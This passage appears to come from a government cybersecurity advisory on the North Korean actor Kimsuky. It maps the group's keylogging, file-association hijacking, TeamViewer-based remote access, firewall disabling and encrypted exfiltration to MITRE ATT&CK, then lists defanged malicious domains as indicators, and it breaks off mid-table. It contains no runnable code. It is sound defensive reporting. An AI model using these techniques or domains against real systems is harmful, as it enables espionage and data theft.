<p>Kimsuky collects data from the victim system through its HWP document malware and its keylogger (<em>Collection</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0009/”>TA0009</a>]). The HWP document malware changes the default program association in the Registry to open HWP documents (<em>Event Triggered Execution: Change Default File Association</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1546/001/”>T1546.001</a>]). When a user opens an HWP file, the Registry key change triggers the execution of malware that opens the HWP document and then sends a copy of the HWP document to an account under the adversary’s control. The malware then allows the user to open the file as normal without any indication to the user that anything has occurred. The keylogger intercepts keystrokes and writes them to <code>C:Program FilesCommon FilesSystemOle DBmsolui80.inc</code> and records the active window name where the user pressed keys (<em>Input Capture: Keylogging</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1056/001/”>T1056.001</a>]). There is another keylogger variant that logs keystrokes into <code>C:WINDOWSsetup.log</code>.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>56</a>]</p>

<p>Kimsuky has also used a Mac OS Python implant that gathers data from Mac OS systems and sends it to a C2 server (<em>Command and Scripting Interpreter: Python</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1059/006/”>T1059.006]</a>). The Python program downloads various implants based on C2 options specified after the <code>filedown.php</code> (see figure 4).</p>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 4: Python Script targeting MacOS</em> [57]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Command and Control</h4>

<p>Kimsuky has used a modified TeamViewer client, version 5.0.9104, for <em>Command and Control</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0011/”>TA0011</a>] (<em>Remote Access Software</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1219/”>T1219</a>]). During the initial infection, the service “Remote Access Service” is created and adjusted to execute <code>C:WindowsSystem32vcmon.exe</code> at system startup (<em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/001/”>T1547.001</a>]). Every time <code>vcmon.exe</code> is executed, it disables the firewall by zeroing out Registry values (<em>Impair Defenses: Disable or Modify System Firewall </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/004/”>T1562.004</a>]). The program then modifies the TeamViewer Registry settings by changing the <code>TeamViewer</code> strings in TeamViewer components. The launcher then configures several Registry values, including <code>SecurityPasswordAES</code>, that control how the remote access tool will work. The <code>SecurityPasswordAES</code> Registry value represents a hash of the password used by a remote user to connect to TeamViewer Client (Use Alternate Authentication Material: Pass the Hash [<a href=”https://attack.mitre.org/techniques/T1550/002/”>T1550.002</a>]). This way, the attackers set a pre-shared authentication value to have access to the TeamViewer Client. The attacker will then execute the TeamViewer client <code>netsvcs.exe</code>.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>58</a>]</p>

<p>Kimsuky has been using a consistent format. In the URL used recently—<code>express[.]php?op=1</code>—there appears to be an option range from 1 to 3.[59]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Exfiltration</h4>

<p>Open-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email or through an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer (<em>Exfiltration </em>[<a href=”https://attack.mitre.org/versions/v7/tactics/TA0010/”>TA0010</a>]).</p>

<p>There was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky’s intention is to steal information, not to disrupt computer networks. Kimsuky’s preferred method for sending or receiving exfiltrated information is through email, with their malware on the victim machine encrypting the data before sending it to a C2 server (<em>Archive Collected Data</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1560″>T1560</a>]).  Kimsuky also sets up auto-forward rules within a victim’s email account (E<em>mail Collection: Email Forwarding Rule</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1114/003/”>T1114.003</a>]).</p>

<p>Kimsuky also uses an RC4 key generated as an MD5 hash or a randomly generated 117-bytes buffer to exfiltrate stolen data. The data is sent RSA-encrypted (E<em>ncrypted Channel: Symmetric Cryptography</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1573/001″>T1573.001</a>]). Kimsuky’s malware constructs an 1120-bit public key and uses it to encrypt the 117-bytes buffer. The resulting data file is saved in <code>C:Program FilesCommon FilesSystemOle DB</code> (<em>Data Staged: Local Data Staging</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1074/001″>T1074.001</a>]).[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>60</a>]</p>
<h3>Mitigations</h3><h4 style=”margin-top: 8px; margin-bottom: 8px;”>Indicators of Compromise</h4>

<p style=”margin-top: 8px; margin-bottom: 8px;”><font color=”#000000″><font size=”3″>Kimsuky has used the domains listed in table 1 to carry out its objectives:</font></font></p>

<p style=”margin-bottom: 8px;”><font color=”#000000″><font size=”3″>For a downloadable copy of IOCs, see<a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-301A.stix.xml”> AA20-301A.stix</a>.</font></font></p>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Table 1: Domains used by Kimsuky</em></p>

<table style=”border: medium none; width: 741px; border-collapse: collapse; margin-left: auto; margin-right: auto;”>
<tbody>
<tr height=”px | %”>
<td style=”padding: 0in 7px; border: 1px solid black; border-image: none; width: 227px;” valign=”top”>
<p><code>login.bignaver[.]com</code></p>
</td>
<td style=”border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p><code>nytimes.onekma[.]com</code></p>
</td>
<td style=”border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p><code>webuserinfo[.]com</code></p>
</td>
</tr>
<tr height=”px | %”>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p><code>member.navier.pe[.]hu</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p><code>nid.naver.onektx[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>pro-navor[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>cloudnaver[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>read.tongilmoney[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver[.]pw</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>resetprofile[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nid.naver.unicrefia[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>daurn[.]org</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>servicenidnaver[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>mail.unifsc[[.]com </code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]de</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>account.daurn.pe[.]hu</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>member.daum.unikortv[.]com </code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>ns.onekorea[.]me</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>login.daum.unikortv[.]com<span style=”color: black;”><font face=”Consolas”><font size=”3″><font style=”background-color: rgb(191, 191, 191);”> </font></font></font></span></code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>securetymail[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>riaver[.]site</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>account.daum.unikortv[.]com<span style=”color: black;”><font face=”Consolas”><font size=”3″><font style=”background-color: rgb(191, 191, 191);”> </font></font></font></span></code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>help-navers[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>mailsnaver[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>daum.unikortv[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>beyondparallel.sslport[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>cloudmail[.]cloud</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”><code>member.daum.uniex[.]kr</code></td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>comment.poulsen[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>helpnaver[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>jonga[.]ml</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>impression.poulsen[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>view-naver[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>myaccounts.gmail.kr-infos[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>statement.poulsen[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>view-hanmail[.]net</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.hol[.]es</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>demand.poulsen[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>login.daum.net-accounts[.]info</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>dept-dr.lab.hol[.]es</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>sankei.sslport[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>read-hanmail[.]net</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>Daurn.pe[.]hu</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>sts.desk-top[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>net.tm[.]ro</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>Bigfile.pe[.]hu</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>hogy.desk-top[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>daum.net[.]pl</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>Cdaum.pe[.]hu</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>kooo[.]gq </code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>usernaver[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>eastsea.or[.]kr</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>tiosuaking[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]ec</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>myaccount.nkaac[.]net</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>help.unikoreas[.]kr</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]mx</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.koreagov[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>resultview[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]se</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.onegov[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>account.daum.unikftc[.]kr</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]cm</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>member-authorize[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>ww-naver[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nid.naver.com[.]se</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.unibok[.]kr</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>vilene.desk-top[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>csnaver[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nid.naver.unibok[.]kr</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>amberalexander.ghtdev[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p><code>nidnaver[.]email</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>read-naver[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nidnaver[.]net</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>cooper[.]center</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>dubai-1[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>coinone.co[.]in</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nidlogin.naver.corper[.]be</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>amberalexander.ghtdev[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.com[.]pl</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>nid.naver.corper[.]be</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>gloole[.]net</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver[.]cx</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naverdns[.]co</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>smtper[.]org</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>smtper[.]cz</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>naver.co[.]in</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>login.daum.kcrct[.]ml</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>myetherwallet.com[.]mx</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>downloadman06[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>login.outlook.kcrct[.]ml</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>myetherwallet.co[.]in </code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>loadmanager07[.]com</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>top.naver.onekda[.]com</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>com-download[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>com-option[.]work</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>com-sslnet[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>com-vps[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>com-ssl[.]work</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>desk-top[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>intemet[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>jp-ssl[.]work</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>org-vip[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>sslport[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>sslserver[.]work</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>ssltop[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 232px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>taplist[.]work</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 244px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>vpstop[.]work</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 227px;” valign=”top”>
<p style=”margin-bottom: 8px;”><code>webmain[.]work</code></p>
</td>
